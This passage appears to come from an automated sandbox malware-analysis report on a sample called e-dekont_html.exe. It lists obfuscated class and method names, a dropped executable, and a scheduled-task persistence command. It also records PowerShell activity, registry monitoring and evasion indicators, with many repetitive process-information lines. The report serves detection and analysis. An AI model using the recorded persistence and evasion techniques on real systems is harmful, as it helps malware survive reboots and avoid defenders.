                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, w6fVOnaEhaOjHBKUqm.cs  High entropy of concatenated method names: 'vCJaORo2iZ7h9HgmlHY', 'wpYXgxo6VkkBLSHtGx4', 'yJkN939xYd', 'r4ZNhbYqF9', 'GAdNjfe4B8', 'GojxD1ogmuWO0gmFaJL', 'DUikTCoH1sOrluF5Aao'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, JLoSIhwA97O7XLgyC7.cs  High entropy of concatenated method names: 'Dispose', 'u7s3ip9b0q', 'HIsI5qVWua', 'PQGvKUhrk2', 'drf34d0xPF', 'yBd3zNTJF5', 'ProcessDialogKey', 'ht9IZYc6hA', 'gZEI3SUHIm', 'hCxIIot7Hh'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, VtsXqUbvS3rdPxQGMo.cs  High entropy of concatenated method names: 'LvKhl7BSXy', 'kNxh5VoL3m', 'RTIhqnLPI7', 'H13hT8gA18', 'xiQhVC0Zbg', 'IjfhEWJIcW', 'WbihdqoDdO', 'JUMhkMMNeB', 'U7fhpxcFKU', 'UPwhXQtc5f'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, dHRLn7q7YB03FnCZfRs.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sQkvhllP1m', 'vBcvjUsDuw', 'adjvfcQVj6', 'rf9vv9X715', 'fXvvQu8DDh', 'xSyveUxkIQ', 'lgYvHNyPSK'
                Source: C:\Users\user\Desktop\e-dekont_html.exe  File created: C:\Users\user\AppData\Roaming\fahKSvwo.exe

                Boot Survival

                Source: C:\Users\user\Desktop\e-dekont_html.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fahKSvwo.exe PID: 7432, type: MEMORYSTR
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 2C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 4C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 9010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: A010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: A220000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: B220000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 2D90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: 4D90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 8950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 9950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 9B40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: AB40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 1590000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 32A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory allocated: 31A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
